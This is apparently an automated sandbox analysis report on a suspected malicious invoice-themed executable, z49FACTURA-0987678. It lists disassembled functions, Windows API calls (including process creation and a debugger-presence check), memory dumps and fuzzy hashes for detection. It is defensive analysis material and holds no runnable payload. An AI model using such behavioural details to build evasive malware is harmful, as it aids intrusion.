                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: __fread_nolock_memmove
                                                                            • String ID: EA06
                                                                            • API String ID: 1988441806-3962188686
                                                                            • Opcode ID: e935a250548ede965de484b58d1bc1c6037aa25bfe5202cecbf576dfa681bdd1
                                                                            • Instruction ID: f694df873f1759e8c5e4e7fc3450f3e5ee720d4274b4aae713d622b10da5cc8b
                                                                            • Opcode Fuzzy Hash: e935a250548ede965de484b58d1bc1c6037aa25bfe5202cecbf576dfa681bdd1
                                                                            • Instruction Fuzzy Hash: 0A01B972D042187EDF18DAA8CC56EFE7BF8DB15311F00459AF652D2181E979E6049760
                                                                            Function 00EF0DB6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00EF571C: __FF_MSGBANNER.LIBCMT ref: 00EF5733
                                                                              • Part of subcall function 00EF571C: __NMSG_WRITE.LIBCMT ref: 00EF573A
                                                                              • Part of subcall function 00EF571C: RtlAllocateHeap.NTDLL(01130000,00000000,00000001), ref: 00EF575F
                                                                            • std::exception::exception.LIBCMT ref: 00EF0DEC
                                                                            • __CxxThrowException@8.LIBCMT ref: 00EF0E01
                                                                              • Part of subcall function 00EF859B: RaiseException.KERNEL32(?,?,00000000,00F89E78,?,00000001,?,?,?,00EF0E06,00000000,00F89E78,00ED9E8C,00000001), ref: 00EF85F0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                            • String ID: bad allocation
                                                                            • API String ID: 3902256705-2104205924
                                                                            • Opcode ID: bfb30d3e997968608959ffe7a41bae3f3534fe9c1c864abe7070b58b8d7bc8da
                                                                            • Instruction ID: 1f362db2de49e407b6377c3a6fc20dcba0bad41077e07e9114d53c8404cd8c63
                                                                            • Opcode Fuzzy Hash: bfb30d3e997968608959ffe7a41bae3f3534fe9c1c864abe7070b58b8d7bc8da
                                                                            • Instruction Fuzzy Hash: 9AF0A43190021E67CB10BAA4ED019FE7BEC9F01355F105426FB14B6183EFB19A40D6D1
                                                                            Function 0116DE28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 0116DE6D
                                                                            • ExitProcess.KERNEL32(00000000), ref: 0116DE8C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1299273104.000000000116C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0116C000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_116c000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Process$CreateExit
                                                                            • String ID: D
                                                                            • API String ID: 126409537-2746444292
                                                                            • Opcode ID: 0821f884aa5cc6b4c195274ad0b22897ff79d929f6fdf946f6e29fa30509634f
                                                                            • Instruction ID: 5c1ed28ee8b075171433cc79ead012ad03e0cd09a161799a73c3e2ec7b23a4ba
                                                                            • Opcode Fuzzy Hash: 0821f884aa5cc6b4c195274ad0b22897ff79d929f6fdf946f6e29fa30509634f
                                                                            • Instruction Fuzzy Hash: 15F0ECB154425DABDB64EFE0CC49FEE777CBF04705F408508BA4A9A180DB7996188B61
                                                                            Function 00F398E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetTempPathW.KERNEL32(00000104,?), ref: 00F398F8
                                                                            • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00F3990F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Temp$FileNamePath
                                                                            • String ID: aut
                                                                            • API String ID: 3285503233-3010740371
                                                                            • Opcode ID: e3fda4ce9cc9c718ec1a7eb92819fe8e2fe9c9b2ceaa497ba05e93d3a5915714
                                                                            • Instruction ID: 3bcb7057e8d1523c06517883477d2cc5e44e2f0ba05f4d9f730d768eb727253b
                                                                            • Opcode Fuzzy Hash: e3fda4ce9cc9c718ec1a7eb92819fe8e2fe9c9b2ceaa497ba05e93d3a5915714
                                                                            • Instruction Fuzzy Hash: B5D05EB958030DABDB50ABA0DC0EFDA773CE704701F4002F1BB54960A1EAB095999B92
                                                                            Function 00F4CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d77f41ecbb1b574e2d5e720997e894501b07053f27aeda763475cf53badd36df
                                                                            • Instruction ID: d8e46cb842382c23ddc3347daac6b513f364cfa2269a393c763b207c5052906c
                                                                            • Opcode Fuzzy Hash: d77f41ecbb1b574e2d5e720997e894501b07053f27aeda763475cf53badd36df
                                                                            • Instruction Fuzzy Hash: 0CF16E71A083009FC754DF28C880A6ABBE5FF88324F14992EF8999B351D735E945DF92
                                                                            Function 00EDF76F Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00EF0162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00EF0193
                                                                              • Part of subcall function 00EF0162: MapVirtualKeyW.USER32(00000010,00000000), ref: 00EF019B
                                                                              • Part of subcall function 00EF0162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00EF01A6
                                                                              • Part of subcall function 00EF0162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00EF01B1
                                                                              • Part of subcall function 00EF0162: MapVirtualKeyW.USER32(00000011,00000000), ref: 00EF01B9
                                                                              • Part of subcall function 00EF0162: MapVirtualKeyW.USER32(00000012,00000000), ref: 00EF01C1
                                                                              • Part of subcall function 00EE60F9: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 00EE6154
                                                                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00EDF9CD
                                                                            • OleInitialize.OLE32(00000000), ref: 00EDFA4A
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00F145C8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual$Handle$ClipboardCloseFormatInitializeRegister
                                                                            • String ID:
                                                                            • API String ID: 3094916012-0
                                                                            • Opcode ID: 41fc0c48d41cf0e8db54014807b84946e63299b04f2f3c931200404b8ff0a2d4
                                                                            • Instruction ID: e08acadd7403fdeade80d8642b3d9882f1bd2e9c4e5e1caa0038f7282c100df5
                                                                            • Opcode Fuzzy Hash: 41fc0c48d41cf0e8db54014807b84946e63299b04f2f3c931200404b8ff0a2d4
                                                                            • Instruction Fuzzy Hash: 9581F0B0905A48CFC7C6DF7EA9606197BE6FB88B06750812BD518CB332E7704489EF12
                                                                            Function 00ED434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00ED4370
                                                                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00ED4415
                                                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00ED4432
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: IconNotifyShell_$_memset
                                                                            • String ID:
                                                                            • API String ID: 1505330794-0
                                                                            • Opcode ID: b63ddb0cab6231b59a6e170e981e777e0957058b6e602941e47042764b702491
                                                                            • Instruction ID: f6aaf6c13f55c623ebbe43e2aa62441f622fc4bef2acf958e4390969d66e33e9
                                                                            • Opcode Fuzzy Hash: b63ddb0cab6231b59a6e170e981e777e0957058b6e602941e47042764b702491
                                                                            • Instruction Fuzzy Hash: E131BFB05047018FC721EF24D88469BBBF8FB58708F00092FE69A96391E770A945DB92
                                                                            Function 00EF571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __FF_MSGBANNER.LIBCMT ref: 00EF5733
                                                                              • Part of subcall function 00EFA16B: __NMSG_WRITE.LIBCMT ref: 00EFA192
                                                                              • Part of subcall function 00EFA16B: __NMSG_WRITE.LIBCMT ref: 00EFA19C
                                                                            • __NMSG_WRITE.LIBCMT ref: 00EF573A
                                                                              • Part of subcall function 00EFA1C8: GetModuleFileNameW.KERNEL32(00000000,00F933BA,00000104,00000000,00000001,00000000), ref: 00EFA25A
                                                                              • Part of subcall function 00EFA1C8: ___crtMessageBoxW.LIBCMT ref: 00EFA308
                                                                              • Part of subcall function 00EF309F: ___crtCorExitProcess.LIBCMT ref: 00EF30A5
                                                                              • Part of subcall function 00EF309F: ExitProcess.KERNEL32 ref: 00EF30AE
                                                                              • Part of subcall function 00EF8B28: __getptd_noexit.LIBCMT ref: 00EF8B28
                                                                            • RtlAllocateHeap.NTDLL(01130000,00000000,00000001), ref: 00EF575F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                            • String ID:
                                                                            • API String ID: 1372826849-0
                                                                            • Opcode ID: d1f1c14eb3d1d41fe9340adafb32f4d212a8c6b4f2de24ae2d9d2c0cc57aa4f2
                                                                            • Instruction ID: 695cddb7472ea1c0bc0e18efda0584585a1dd643b45b91ba351dbeb5bd70e09a
                                                                            • Opcode Fuzzy Hash: d1f1c14eb3d1d41fe9340adafb32f4d212a8c6b4f2de24ae2d9d2c0cc57aa4f2
                                                                            • Instruction Fuzzy Hash: 3F01D276301B0DDAD6153734EC42A7E73888B62366F112427F719BB1C2DE7099005660
                                                                            Function 00F398A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00F39548,?,?,?,?,?,00000004), ref: 00F398BB
                                                                            • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00F39548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00F398D1
                                                                            • CloseHandle.KERNEL32(00000000,?,00F39548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00F398D8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: File$CloseCreateHandleTime
                                                                            • String ID:
                                                                            • API String ID: 3397143404-0
                                                                            • Opcode ID: 60698224a4db88f92cab26f8bb60b7a920d3f8a1602e34a4299b41bf0e9d65a7
                                                                            • Instruction ID: 20379ac0a52250a3045cb75d7c0508f3bcca5c5cec0bd86167907ad0b6f9b0ec
                                                                            • Opcode Fuzzy Hash: 60698224a4db88f92cab26f8bb60b7a920d3f8a1602e34a4299b41bf0e9d65a7
                                                                            • Instruction Fuzzy Hash: 7DE08632141718B7E7212B54EC09FCA7B19AB06771F104120FB14A90E087B11515A7D8
                                                                            Function 00F38D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _free.LIBCMT ref: 00F38D1B
                                                                              • Part of subcall function 00EF2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00EF9A24), ref: 00EF2D69
                                                                              • Part of subcall function 00EF2D55: GetLastError.KERNEL32(00000000,?,00EF9A24), ref: 00EF2D7B
                                                                            • _free.LIBCMT ref: 00F38D2C
                                                                            • _free.LIBCMT ref: 00F38D3E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                            • String ID:
                                                                            • API String ID: 776569668-0
                                                                            • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                            • Instruction ID: 90e8abbe168ee9191aecbef0f468b5a669aae7b0f8c84f2701fa4caeae6f65d6
                                                                            • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                            • Instruction Fuzzy Hash: 64E012A1A0170946CB24A578A941AA353DC4F583B2B14191DB60DE7186CF68F8439124
                                                                            Function 00EDA9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: CALL
                                                                            • API String ID: 0-4196123274
                                                                            • Opcode ID: 03d386865a7e23253eea158364d7e40406e7254329a5a309a7ee9aa194cf83ab
                                                                            • Instruction ID: 528b7e2af66eea44686a543234b8ed379ec55ad08094dfb1421d89c83ad5eff6
                                                                            • Opcode Fuzzy Hash: 03d386865a7e23253eea158364d7e40406e7254329a5a309a7ee9aa194cf83ab
                                                                            • Instruction Fuzzy Hash: DC225A70508301DFCB24DF14C450A6AB7E1FF84314F19996EE88AAB362D735ED86DB82
                                                                            Function 00ED4C70 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove
                                                                            • String ID: EA06
                                                                            • API String ID: 4104443479-3962188686
                                                                            • Opcode ID: c553c81bec5b643970bc3e0bfc142b6c35b5a562237a6a743766192995314fba
                                                                            • Instruction ID: d2892cead58faf0a36faa85cee668e8680c8e97be74bd086cff7043d44097cb7
                                                                            • Opcode Fuzzy Hash: c553c81bec5b643970bc3e0bfc142b6c35b5a562237a6a743766192995314fba
                                                                            • Instruction Fuzzy Hash: D3415CA1A0415C6BDF219B548891BFE7FE3DB65300F286477EC82BB3C2D6319D4693A1
                                                                            Function 00ED7A51 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove
                                                                            • String ID:
                                                                            • API String ID: 4104443479-0
                                                                            • Opcode ID: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
                                                                            • Instruction ID: 0ee316590d83b9ece134eea8e1b777dcc2e495b5dfdf419f94da088bfddeaa49
                                                                            • Opcode Fuzzy Hash: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
                                                                            • Instruction Fuzzy Hash: 5631C2B6604606AFC704DF68C8D1E69B3A9FF48320714962AE559DB391FB30E921CB90
                                                                            Function 00ED47D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • 74D2C8D0.UXTHEME ref: 00ED4834
                                                                              • Part of subcall function 00EF336C: __lock.LIBCMT ref: 00EF3372
                                                                              • Part of subcall function 00EF336C: RtlDecodePointer.NTDLL(00000001), ref: 00EF337E
                                                                              • Part of subcall function 00EF336C: RtlEncodePointer.NTDLL(?), ref: 00EF3389
                                                                              • Part of subcall function 00ED48FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00ED4915
                                                                              • Part of subcall function 00ED48FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00ED492A
                                                                              • Part of subcall function 00ED3B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00ED3B68
                                                                              • Part of subcall function 00ED3B3A: IsDebuggerPresent.KERNEL32 ref: 00ED3B7A
                                                                              • Part of subcall function 00ED3B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,00F952F8,00F952E0,?,?), ref: 00ED3BEB
                                                                              • Part of subcall function 00ED3B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00ED3C6F
                                                                            • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00ED4874
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: InfoParametersSystem$CurrentDirectoryPointer$DebuggerDecodeEncodeFullNamePathPresent__lock
                                                                            • String ID:
                                                                            • API String ID: 2688871447-0
                                                                            • Opcode ID: f1399e52a107fe467621fdd3ef54ff9140da671453535e05e7eff02998232807
                                                                            • Instruction ID: cb6e1c63f96e8405cf447d9aae044c26d7c84c9ce3e3b6102a199c39d6357225
                                                                            • Opcode Fuzzy Hash: f1399e52a107fe467621fdd3ef54ff9140da671453535e05e7eff02998232807
                                                                            • Instruction Fuzzy Hash: E6119D719083499BC700EF79EC0590ABFE8EF99B50F10451FF040A32B1DB719549EB92
